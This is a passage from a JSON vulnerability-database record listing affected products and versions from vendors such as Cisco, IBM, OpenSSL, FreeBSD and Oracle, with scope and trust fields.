"ibm", "version": "2.0" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50007.3.1" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(3)" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8945" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.18-49" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1.10000.12)" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.3" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "10.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.13-41" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network admission control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "10.1-release-p33", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "telepresence conductor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "abyp-0t-0s-4l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.115" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4.0.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.13" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.6)" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization sr3 es5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "unified communications manager 10.5 su3", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.4" }, { "model": "abyp-2t-2s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "abyp-4tl-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.0(0.400)" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9-34" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "abyp-4ts-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "digital media players series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3100" }, { "model": "9.3-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security proventia network active bypass 0343c3c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "cloud manager with openstack interim fix1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "unified ip phones 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11.0(0.98000.225)" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "websphere application server liberty profile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.4" }, { "model": "unity connection", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.98991.13)" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "abyp-10g-2sr-2lr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "prime optical for sps", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.6" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "45000" }, { "model": "telepresence server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "87104.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50008.3" }, { "model": "10.1-release-p31", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-04" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.1" }, { "model": "netflow generation appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pureapplication system", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.3" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.9.2" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server ssl gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.6" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(1.10000.5)" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.6" }, { "model": "tivoli composite application manager for transactions if37", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "tivoli network manager ip edition fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.94" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.0" }, { "model": "prime license manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.18-42" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.8" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.8" }, { "model": "abyp-4t-0s-0l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "virtual security gateway for microsoft hyper-v vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "connected grid router cgos 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.2.3" }, { "model": "9.3-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.12-01" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "nexus series switches 7.3.1nx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.1" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.3-release-p39", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-114" }, { "model": "telepresence mx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.5" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "spa232d multi-line dect ata", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence profile series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.2" }, { "model": "tivoli netcool system service monitors interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.014-08" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.21" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "globalprotect agent", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "3.1.1" }, { "model": "dcm series 9900-digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "19.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "10.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1876" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "10.3-release-p2", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9951" }, { "model": "local collector appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2.12" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3.7" }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.1" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.17" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.4-12" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder 10.5", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "qradar siem mr2 patch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.113" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "900012.0" }, { "model": "lancope stealthwatch udp director", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7(0)" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings server 2.5mr2", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "services analytic platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified ip phone series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79009.4(2)" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60006.2.17" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.12" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2" }, { "model": "unified series ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "video surveillance media server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.9" }, { "model": "unified communications manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "agent for openflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.5" }, { "model": "10.2-release-p16", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "project openssl 1.0.2h", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.2(1)" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "policy suite", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified communications manager session management edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.1" }, { "model": "anyres live", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.4.5" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "9.3-release-p34", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "tivoli provisioning manager for images system edition build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.20290.1" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.10" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "webex meetings server mr1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.99.2" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "jazz reporting service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "abyp-2t-0s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "prime access registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mysql enterprise backup", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.0.1" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "asa cx and cisco prime security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.5.4.3" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "9.3-release-p29", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm server for", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "x863.2" }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(2.13900.9)" }, { "model": "ip interoperability and 